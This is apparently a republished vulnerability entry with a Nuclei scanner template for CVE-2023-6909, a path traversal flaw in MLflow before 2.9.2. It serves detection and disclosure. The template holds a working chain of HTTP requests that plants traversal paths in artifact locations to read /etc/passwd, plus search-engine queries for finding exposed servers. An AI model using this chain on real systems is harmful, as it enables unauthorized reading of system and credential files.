
Mlflow <2.9.2 - Path Traversal

Published: 2024-02-02 10:20:55
Source: ProjectDiscovery (github.com)

Tags: path traversal, github, mlflow, sensitive information, ssh keys, internal configurations, update vulnerability

CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS: 0.005 Low
EPSS Percentile: 76.3%

Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.

id: CVE-2023-6909

info:
  name: Mlflow <2.9.2 - Path Traversal
  author: Hyunsoo-ds
  severity: high
  description: |
    Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
  impact: |
    Successful exploitation could lead to disclosure of sensitive information such as SSH keys or internal configurations.
  remediation: |
    To fix this vulnerability, update the mlflow package to the latest version (2.10.0).
  reference:
    - https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6909
    - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6909
    cwe-id: CWE-29
    epss-score: 0.00494
    epss-percentile: 0.76167
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: lfprojects
    product: mlflow
    shodan-query: "http.title:\"mlflow\""
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve,cve2023,mlflow,lfi,intrusive,lfprojects

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
        Host: {{Hostname}}

        {"name" : "{{randstr}}", "artifact_location": "http:///?/../../../../../../../../../../../../../../etc/"}

      - |
        POST /api/2.0/mlflow/runs/create HTTP/1.1
        Host: {{Hostname}}

        {"experiment_id": "{{EXPERIMENT_ID}}"}

      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}

        {"name": "{{randstr}}"}

      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}

        {"name" : "{{randstr}}", "run_id": "{{RUN_ID}}", "source" : "file:///etc/"}

      - |
        GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header_5
        words:
          - "filename=passwd"
          - "application/octet-stream"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body_1
        name: EXPERIMENT_ID
        group: 1
        json:
          - '.experiment_id'
        internal: true

      - type: json
        part: body_2
        name: RUN_ID
        group: 1
        json:
          - '.run.info.run_id'
        internal: true
# digest: 4a0a00473045022100db5504fc5ccec8cb533fd47b571ed5f305ea8139bb810af6027e28961ced040f02206640d8721c739138031e655a2f394b7ceda41c462823e52e45cf0ba23b260200:922c64590222798bb761d5b6d8e72950
